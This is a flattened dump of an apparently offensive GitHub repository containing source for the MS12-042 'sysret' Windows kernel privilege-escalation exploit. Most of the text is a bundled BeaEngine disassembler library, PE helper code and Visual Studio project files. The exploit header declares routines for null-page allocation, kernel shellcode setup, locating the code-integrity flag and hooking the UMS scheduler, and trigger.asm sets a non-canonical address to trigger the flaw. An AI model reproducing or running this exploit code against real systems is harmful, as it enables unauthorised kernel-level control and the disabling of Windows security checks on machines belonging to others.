| PeGetCodeSectionAddress( 17 | IN PVOID BaseAddress 18 | ); 19 | 20 | DWORD 21 | PeGetCodeSectionSize( 22 | IN PVOID BaseAddress 23 | ); -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/peutils.cpp: -------------------------------------------------------------------------------- 1 | #include "peutil.h" 2 | 3 | /* WTF _WIN64 is not defined!!!! */ 4 | PVOID 5 | PeGetCodeSectionAddress( 6 | IN PVOID BaseAddress 7 | ) 8 | { 9 | PIMAGE_OPTIONAL_HEADER64 pOptionalHeader; 10 | 11 | pOptionalHeader = (PIMAGE_OPTIONAL_HEADER64) OPTHDROFFSET(BaseAddress); 12 | return (PVOID)(pOptionalHeader->BaseOfCode + (ULONG_PTR)BaseAddress); 13 | } 14 | 15 | DWORD 16 | PeGetCodeSectionSize( 17 | IN PVOID BaseAddress 18 | ) 19 | { 20 | PIMAGE_OPTIONAL_HEADER64 pOptionalHeader; 21 | 22 | pOptionalHeader = (PIMAGE_OPTIONAL_HEADER64) OPTHDROFFSET(BaseAddress); 23 | return pOptionalHeader->SizeOfCode; 24 | } -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/BeaEngine.c: -------------------------------------------------------------------------------- 1 | /* 2 | * BeaEngine 4 - x86 & x86-64 disassembler library 3 | * 4 | * Copyright 2006-2010, BeatriX 5 | * File coded by BeatriX 6 | * 7 | * This file is part of BeaEngine. 8 | * 9 | * BeaEngine is free software: you can redistribute it and/or modify 10 | * it under the terms of the GNU Lesser General Public License as published by 11 | * the Free Software Foundation, either version 3 of the License, or 12 | * (at your option) any later version. 13 | * 14 | * BeaEngine is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU Lesser General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU Lesser General Public License 20 | * along with BeaEngine. If not, see . */ 21 | 22 | #include 23 | #include 24 | #include 25 | 26 | #include "../include/beaengine/BeaEngine.h" 27 | #include "Includes/protos.h" 28 | #include "Includes/internal_datas.h" 29 | #include "Includes/instr_set/Data_opcode.h" 30 | #include "Includes/instr_set/opcodes_A_M.c" 31 | #include "Includes/instr_set/opcodes_N_Z.c" 32 | #include "Includes/instr_set/opcodes_Grp1.c" 33 | #include "Includes/instr_set/opcodes_Grp2.c" 34 | #include "Includes/instr_set/opcodes_Grp3.c" 35 | #include "Includes/instr_set/opcodes_Grp4.c" 36 | #include "Includes/instr_set/opcodes_Grp5.c" 37 | #include "Includes/instr_set/opcodes_Grp6.c" 38 | #include "Includes/instr_set/opcodes_Grp7.c" 39 | #include "Includes/instr_set/opcodes_Grp8.c" 40 | #include "Includes/instr_set/opcodes_Grp9.c" 41 | #include "Includes/instr_set/opcodes_Grp12.c" 42 | #include "Includes/instr_set/opcodes_Grp13.c" 43 | #include "Includes/instr_set/opcodes_Grp14.c" 44 | #include "Includes/instr_set/opcodes_Grp15.c" 45 | #include "Includes/instr_set/opcodes_Grp16.c" 46 | #include "Includes/instr_set/opcodes_FPU.c" 47 | #include "Includes/instr_set/opcodes_MMX.c" 48 | #include "Includes/instr_set/opcodes_SSE.c" 49 | #include "Includes/instr_set/opcodes_AES.c" 50 | #include "Includes/instr_set/opcodes_CLMUL.c" 51 | #include "Includes/instr_set/opcodes_prefixes.c" 52 | #include "Includes/Routines_ModRM.c" 53 | #include "Includes/Routines_Disasm.c" 54 | #include "Includes/BeaEngineVersion.c" 55 | 56 | void BeaEngine(void){return;} 57 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/BeaEngine.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/junk/sources/beaengineSources/BeaEngine.obj -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | set (BEA_SOURCES BeaEngine.c) 2 | 3 | if (optBUILD_DLL) 4 | add_library (${BEA_TARGET} SHARED BeaEngine.c) 5 | set_target_properties (${BEA_TARGET} PROPERTIES COMPILE_FLAGS "-DBUILD_BEA_ENGINE_DLL") 6 | else () 7 | add_library (${BEA_TARGET} STATIC BeaEngine.c) 8 | set_target_properties (${BEA_TARGET} PROPERTIES COMPILE_FLAGS "-DBEA_ENGINE_STATIC") 9 | endif () 10 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/Includes/BeaEngineVersion.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2006-2010, BeatriX 2 | * File coded by BeatriX 3 | * 4 | * This file is part of BeaEngine. 5 | * 6 | * BeaEngine is free software: you can redistribute it and/or modify 7 | * it under the terms of the GNU Lesser General Public License as published by 8 | * the Free Software Foundation, either version 3 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * BeaEngine is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public License 17 | * along with BeaEngine. If not, see . */ 18 | const__ char* __bea_callspec__ BeaEngineVersion(void) { 19 | return "4.1"; 20 | } 21 | const__ char* __bea_callspec__ BeaEngineRevision(void) { 22 | return "170"; 23 | } 24 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_CLMUL.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2006-2009, BeatriX 2 | * File coded by BeatriX 3 | * 4 | * This file is part of BeaEngine. 5 | * 6 | * BeaEngine is free software: you can redistribute it and/or modify 7 | * it under the terms of the GNU Lesser General Public License as published by 8 | * the Free Software Foundation, either version 3 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * BeaEngine is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public License 17 | * along with BeaEngine. If not, see . */ 18 | 19 | /* ==================================================================== 20 | * 0x 0f 3a 44 21 | * ==================================================================== */ 22 | void __bea_callspec__ pclmulqdq_(PDISASM pMyDisasm) 23 | { 24 | /* ========== 0x66 */ 25 | if (GV.OperandSize == 16) { 26 | (*pMyDisasm).Prefix.OperandSize = MandatoryPrefix; 27 | GV.MemDecoration = Arg2dqword; 28 | (*pMyDisasm).Instruction.Category = CLMUL_INSTRUCTION; 29 | 30 | GV.ImmediatSize = 8; 31 | GV.SSE_ = 1; 32 | GxEx(pMyDisasm); 33 | GV.SSE_ = 0; 34 | GV.EIP_++; 35 | if (!Security(0, pMyDisasm)) return; 36 | 37 | (*pMyDisasm).Instruction.Immediat = *((UInt8*)(UIntPtr) (GV.EIP_- 1)); 38 | 39 | if ((*pMyDisasm).Instruction.Immediat == 0) { 40 | #ifndef BEA_LIGHT_DISASSEMBLY 41 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmullqlqdq "); 42 | #endif 43 | } 44 | else if ((*pMyDisasm).Instruction.Immediat == 0x01 ) { 45 | #ifndef BEA_LIGHT_DISASSEMBLY 46 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmulhqlqdq "); 47 | #endif 48 | } 49 | else if ((*pMyDisasm).Instruction.Immediat == 0x10 ) { 50 | #ifndef BEA_LIGHT_DISASSEMBLY 51 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmullqhqdq "); 52 | #endif 53 | } 54 | else if ((*pMyDisasm).Instruction.Immediat == 0x011 ) { 55 | #ifndef BEA_LIGHT_DISASSEMBLY 56 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmulhqhqdq "); 57 | #endif 58 | } 59 | else { 60 | #ifndef BEA_LIGHT_DISASSEMBLY 61 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "pclmulqdq "); 62 | #endif 63 | GV.third_arg = 1; 64 | #ifndef BEA_LIGHT_DISASSEMBLY 65 | (void) CopyFormattedNumber(pMyDisasm, (char*) (*pMyDisasm).Argument3.ArgMnemonic, "%.2X",(Int64) *((UInt8*)(UIntPtr) (GV.EIP_- 1))); 66 | #endif 67 | (*pMyDisasm).Argument3.ArgType = CONSTANT_TYPE+ABSOLUTE_; 68 | (*pMyDisasm).Argument3.ArgSize = 8; 69 | } 70 | } 71 | else { 72 | FailDecode(pMyDisasm); 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp16.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2006-2009, BeatriX 2 | * File coded by BeatriX 3 | * 4 | * This file is part of BeaEngine. 5 | * 6 | * BeaEngine is free software: you can redistribute it and/or modify 7 | * it under the terms of the GNU Lesser General Public License as published by 8 | * the Free Software Foundation, either version 3 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * BeaEngine is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public License 17 | * along with BeaEngine. If not, see . */ 18 | 19 | /* ==================================================================== 20 | * 21 | * ==================================================================== */ 22 | void __bea_callspec__ G16_(PDISASM pMyDisasm) 23 | { 24 | GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7; 25 | if (GV.REGOPCODE == 0) { 26 | MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm); 27 | if (GV.MOD_!= 0x3) { 28 | GV.MemDecoration = Arg2byte; 29 | (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL; 30 | #ifndef BEA_LIGHT_DISASSEMBLY 31 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchNTA "); 32 | #endif 33 | } 34 | else { 35 | FailDecode(pMyDisasm); 36 | } 37 | } 38 | else if (GV.REGOPCODE == 1) { 39 | MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm); 40 | if (GV.MOD_!= 0x3) { 41 | GV.MemDecoration = Arg2byte; 42 | (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL; 43 | #ifndef BEA_LIGHT_DISASSEMBLY 44 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchT0 "); 45 | #endif 46 | } 47 | else { 48 | FailDecode(pMyDisasm); 49 | } 50 | 51 | } 52 | else if (GV.REGOPCODE == 2) { 53 | MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm); 54 | if (GV.MOD_!= 0x3) { 55 | GV.MemDecoration = Arg2byte; 56 | (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL; 57 | #ifndef BEA_LIGHT_DISASSEMBLY 58 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchT1 "); 59 | #endif 60 | } 61 | else { 62 | FailDecode(pMyDisasm); 63 | } 64 | 65 | } 66 | else if (GV.REGOPCODE == 3) { 67 | MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm); 68 | if (GV.MOD_!= 0x3) { 69 | GV.MemDecoration = Arg2byte; 70 | (*pMyDisasm).Instruction.Category = SSE_INSTRUCTION+CACHEABILITY_CONTROL; 71 | #ifndef BEA_LIGHT_DISASSEMBLY 72 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "prefetchT2 "); 73 | #endif 74 | } 75 | else { 76 | FailDecode(pMyDisasm); 77 | } 78 | 79 | } 80 | 81 | else { 82 | FailDecode(pMyDisasm); 83 | } 84 | GV.EIP_+= GV.DECALAGE_EIP+2; 85 | } 86 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp4.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2006-2009, BeatriX 2 | * File coded by BeatriX 3 | * 4 | * This file is part of BeaEngine. 5 | * 6 | * BeaEngine is free software: you can redistribute it and/or modify 7 | * it under the terms of the GNU Lesser General Public License as published by 8 | * the Free Software Foundation, either version 3 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * BeaEngine is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public License 17 | * along with BeaEngine. If not, see . */ 18 | 19 | /* ==================================================================== 20 | * 0feh 21 | * ==================================================================== */ 22 | void __bea_callspec__ G4_Eb(PDISASM pMyDisasm) 23 | { 24 | GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7; 25 | if (GV.REGOPCODE == 0) { 26 | if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) { 27 | (*pMyDisasm).Prefix.LockPrefix = InUsePrefix; 28 | } 29 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+ARITHMETIC_INSTRUCTION; 30 | #ifndef BEA_LIGHT_DISASSEMBLY 31 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "inc "); 32 | #endif 33 | Eb(pMyDisasm); 34 | FillFlags(pMyDisasm, 40); 35 | } 36 | else if (GV.REGOPCODE == 1) { 37 | if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) { 38 | (*pMyDisasm).Prefix.LockPrefix = InUsePrefix; 39 | } 40 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+ARITHMETIC_INSTRUCTION; 41 | #ifndef BEA_LIGHT_DISASSEMBLY 42 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "dec "); 43 | #endif 44 | Eb(pMyDisasm); 45 | FillFlags(pMyDisasm, 30); 46 | } 47 | else { 48 | FailDecode(pMyDisasm); 49 | } 50 | } 51 | 52 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp8.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2006-2009, BeatriX 2 | * File coded by BeatriX 3 | * 4 | * This file is part of BeaEngine. 5 | * 6 | * BeaEngine is free software: you can redistribute it and/or modify 7 | * it under the terms of the GNU Lesser General Public License as published by 8 | * the Free Software Foundation, either version 3 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * BeaEngine is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public License 17 | * along with BeaEngine. If not, see . */ 18 | 19 | /* ==================================================================== 20 | * 0fbah 21 | * ==================================================================== */ 22 | void __bea_callspec__ G8_EvIb(PDISASM pMyDisasm) 23 | { 24 | GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7; 25 | EvIb(pMyDisasm); 26 | if (GV.REGOPCODE == 4) { 27 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8; 28 | #ifndef BEA_LIGHT_DISASSEMBLY 29 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "bt "); 30 | #endif 31 | (*pMyDisasm).Argument1.AccessMode = READ; 32 | FillFlags(pMyDisasm, 11); 33 | } 34 | else if (GV.REGOPCODE == 5) { 35 | if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) { 36 | (*pMyDisasm).Prefix.LockPrefix = InUsePrefix; 37 | } 38 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8; 39 | #ifndef BEA_LIGHT_DISASSEMBLY 40 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "bts "); 41 | #endif 42 | (*pMyDisasm).Argument1.AccessMode = READ; 43 | FillFlags(pMyDisasm, 11); 44 | } 45 | else if (GV.REGOPCODE == 6) { 46 | if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) { 47 | (*pMyDisasm).Prefix.LockPrefix = InUsePrefix; 48 | } 49 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8; 50 | #ifndef BEA_LIGHT_DISASSEMBLY 51 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "btr "); 52 | #endif 53 | (*pMyDisasm).Argument1.AccessMode = READ; 54 | FillFlags(pMyDisasm, 11); 55 | } 56 | else if (GV.REGOPCODE == 7) { 57 | if ((*pMyDisasm).Prefix.LockPrefix == InvalidPrefix) { 58 | (*pMyDisasm).Prefix.LockPrefix = InUsePrefix; 59 | } 60 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+BIT_UInt8; 61 | #ifndef BEA_LIGHT_DISASSEMBLY 62 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "btc "); 63 | #endif 64 | (*pMyDisasm).Argument1.AccessMode = READ; 65 | FillFlags(pMyDisasm, 11); 66 | } 67 | else { 68 | FailDecode(pMyDisasm); 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/Includes/instr_set/opcodes_Grp9.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2006-2009, BeatriX 2 | * File coded by BeatriX 3 | * 4 | * This file is part of BeaEngine. 5 | * 6 | * BeaEngine is free software: you can redistribute it and/or modify 7 | * it under the terms of the GNU Lesser General Public License as published by 8 | * the Free Software Foundation, either version 3 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * BeaEngine is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public License 17 | * along with BeaEngine. If not, see . */ 18 | 19 | 20 | /* ==================================================================== 21 | * 0fc7h 22 | * ==================================================================== */ 23 | void __bea_callspec__ G9_(PDISASM pMyDisasm) 24 | { 25 | GV.REGOPCODE = ((*((UInt8*)(UIntPtr) (GV.EIP_+1))) >> 3) & 0x7; 26 | GV.MemDecoration = Arg2qword; 27 | MOD_RM(&(*pMyDisasm).Argument2, pMyDisasm); 28 | if (GV.REGOPCODE == 1) { 29 | if (GV.REX.W_ == 1) { 30 | GV.MemDecoration = Arg2dqword; 31 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+DATA_TRANSFER; 32 | #ifndef BEA_LIGHT_DISASSEMBLY 33 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "cmpxchg16b "); 34 | #endif 35 | (*pMyDisasm).Argument1.ArgType = REGISTER_TYPE+GENERAL_REG+REG0+REG2; 36 | (*pMyDisasm).Argument1.ArgSize = 128; 37 | (*pMyDisasm).Argument1.AccessMode = READ; 38 | FillFlags(pMyDisasm, 23); 39 | GV.EIP_ += GV.DECALAGE_EIP+2; 40 | } 41 | else { 42 | (*pMyDisasm).Instruction.Category = GENERAL_PURPOSE_INSTRUCTION+DATA_TRANSFER; 43 | #ifndef BEA_LIGHT_DISASSEMBLY 44 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "cmpxchg8b "); 45 | #endif 46 | (*pMyDisasm).Argument1.ArgType = REGISTER_TYPE+GENERAL_REG+REG0+REG2; 47 | (*pMyDisasm).Argument1.ArgSize = 64; 48 | (*pMyDisasm).Argument1.AccessMode = READ; 49 | FillFlags(pMyDisasm, 23); 50 | GV.EIP_ += GV.DECALAGE_EIP+2; 51 | } 52 | } 53 | else if (GV.REGOPCODE == 6) { 54 | (*pMyDisasm).Instruction.Category = VM_INSTRUCTION; 55 | if (GV.OperandSize == 16) { 56 | #ifndef BEA_LIGHT_DISASSEMBLY 57 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmclear "); 58 | #endif 59 | } 60 | else if (GV.PrefRepe == 1) { 61 | #ifndef BEA_LIGHT_DISASSEMBLY 62 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmxon "); 63 | #endif 64 | } 65 | else { 66 | #ifndef BEA_LIGHT_DISASSEMBLY 67 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmptrld "); 68 | #endif 69 | } 70 | GV.EIP_ += GV.DECALAGE_EIP+2; 71 | 72 | } 73 | else if (GV.REGOPCODE == 7) { 74 | (*pMyDisasm).Instruction.Category = VM_INSTRUCTION; 75 | #ifndef BEA_LIGHT_DISASSEMBLY 76 | (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmptrst "); 77 | #endif 78 | GV.EIP_ += GV.DECALAGE_EIP+2; 79 | } 80 | else { 81 | FailDecode(pMyDisasm); 82 | } 83 | 84 | } 85 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/beaengineSources/README.txt: -------------------------------------------------------------------------------- 1 | ; ======================================== 2 | ; 3 | ; BeaEngine 4 4 | ; 5 | ; ======================================== 6 | 7 | 1) LICENSE 8 | ========== 9 | 10 | This software is distributed under the LGPL license. 11 | See the COPYING and COPYING.LESSER files for more details. 12 | 13 | 14 | 2) ONLINE DOCUMENTATION 15 | ======================= 16 | 17 | For online documentation, visit : 18 | 19 | http://www.beaengine.org 20 | 21 | 22 | 3) AUTHOR, CONTRIBUTORS, BETA-TESTERS 23 | ========================================== 24 | 25 | BeatriX - Author (France) : beaengine (at) gmail.com 26 | Igor Gutnik - Developer (ported the project on linux) 27 | 28 | Contributors : 29 | 30 | andrewl, bax, William Pomian, Ange Albertini, Pyrae, Vincent Roy, Kharneth, Eedy, Neitsa, KumaT, Rafal Cyran, 29a metal, sessiondiy, Tim, vince, Igor Gutnik, ouadji, Helle, Baboon, pop9080, ktion23. 31 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sources/include/beaengine/macros.h: -------------------------------------------------------------------------------- 1 | #ifndef __BEAENGINE_MACROS_H__ 2 | #define __BEAENGINE_MACROS_H__ 3 | /* 4 | ============================================================================ 5 | Compiler Silencing macros 6 | 7 | Some compilers complain about parameters that are not used. This macro 8 | should keep them quiet. 9 | ============================================================================ 10 | */ 11 | 12 | # if defined (__GNUC__) && ((__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 2))) 13 | # define BEA_UNUSED_ARG(a) (void) (a) 14 | #elif defined (ghs) || defined (__GNUC__) || defined (__hpux) || defined (__sgi) || defined (__DECCXX) || defined (__rational__) || defined (__USLC__) || defined (BEA__RM544) || defined (__DCC__) || defined (__PGI) || defined (__TANDEM) || defined(__BORLANDC__) 15 | /* 16 | Some compilers complain about "statement with no effect" with (a). 17 | This eliminates the warnings, and no code is generated for the null 18 | conditional statement. Note, that may only be true if -O is enabled, 19 | such as with GreenHills (ghs) 1.8.8. 20 | */ 21 | 22 | # define BEA_UNUSED_ARG(a) do {/* null */} while (&a == 0) 23 | #elif defined (__DMC__) 24 | #if defined(__cplusplus) 25 | #define BEA_UNUSED_ID(identifier) 26 | template 27 | inline void BEA_UNUSED_ARG(const T& BEA_UNUSED_ID(t)) { } 28 | #else 29 | #define BEA_UNUSED_ARG(a) 30 | #endif 31 | #else /* ghs || __GNUC__ || ..... */ 32 | # define BEA_UNUSED_ARG(a) (a) 33 | #endif /* ghs || __GNUC__ || ..... */ 34 | 35 | #if defined (_MSC_VER) || defined(__sgi) || defined (ghs) || defined (__DECCXX) || defined(__BORLANDC__) || defined (BEA_RM544) || defined (__USLC__) || defined (__DCC__) || defined (__PGI) || defined (__TANDEM) || (defined (__HP_aCC) && (__HP_aCC >= 60500)) 36 | # define BEA_NOTREACHED(a) 37 | #else /* __sgi || ghs || ..... */ 38 | # define BEA_NOTREACHED(a) a 39 | #endif /* __sgi || ghs || ..... */ 40 | 41 | #endif /* __BEAENGINE_MACROS_H__ */ 42 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // junk.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/sysret.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib,"psapi.lib") 5 | #pragma once 6 | 7 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 8 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 9 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 10 | 11 | typedef enum _SYSTEM_INFORMATION_CLASS 12 | { 13 | SystemModuleInformation = 11, 14 | SystemHandleInformation = 16 15 | } SYSTEM_INFORMATION_CLASS; 16 | 17 | typedef 18 | NTSTATUS 19 | (NTAPI *NtAllocateVirtualMemory_)( 20 | __in HANDLE ProcessHandle, 21 | __inout PVOID *BaseAddress, 22 | __in ULONG_PTR ZeroBits, 23 | __inout PSIZE_T RegionSize, 24 | __in ULONG AllocationType, 25 | __in ULONG Protect 26 | ); 27 | 28 | BOOL 29 | AlocNullPageAndFixCondtions( 30 | VOID 31 | ); 32 | 33 | BOOL 34 | SetupKernelShellcode( 35 | IN ULONG_PTR UsermodeReturnAddress, 36 | IN ULONG_PTR ProcessId 37 | ); 38 | 39 | BOOL 40 | GetDriverImageBase( 41 | OUT PULONG_PTR DriverBase, 42 | IN PCHAR DriverName 43 | ); 44 | 45 | ULONG_PTR 46 | KernelGetProcAddress( 47 | IN ULONG_PTR UserKernelBase, 48 | IN ULONG_PTR RealKernelBase, 49 | IN LPCSTR SymName 50 | ); 51 | 52 | BOOL 53 | GetKernelBaseInfo( 54 | OUT PULONG_PTR kernelBase, 55 | IN OUT PCHAR kernelImage, 56 | IN UINT Size 57 | ); 58 | 59 | ULONG_PTR 60 | GetCiEnabledAddress( 61 | IN HMODULE hModule 62 | ); 63 | 64 | ULONG_PTR 65 | SpawnProcess( 66 | IN PCHAR szProcess 67 | ); 68 | 69 | ULONG_PTR 70 | GetUmsSchedulerAddress( 71 | VOID 72 | ); 73 | 74 | BOOL 75 | HookUmsScheduler( 76 | VOID 77 | ); 78 | 79 | extern "C" 80 | VOID 81 | SetNonCanonicalAddress( 82 | VOID 83 | ); -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/trigger.asm: -------------------------------------------------------------------------------- 1 | EXTERN OrginalUmsSchedulerAddress :QWORD 2 | 3 | .CODE 4 | SetNonCanonicalAddress PROC FRAME 5 | mov r11, 8000000000000000h 6 | jmp [OrginalUmsSchedulerAddress] 7 | .ENDPROLOG 8 | ret 9 | SetNonCanonicalAddress ENDP 10 | END 11 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/sysret.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "junk", "junk\junk.vcxproj", "{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|Win32.Build.0 = Debug|Win32 16 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|x64.ActiveCfg = Debug|x64 17 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|x64.Build.0 = Debug|x64 18 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|Win32.ActiveCfg = Release|Win32 19 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|Win32.Build.0 = Release|Win32 20 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|x64.ActiveCfg = Release|x64 21 | {33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | 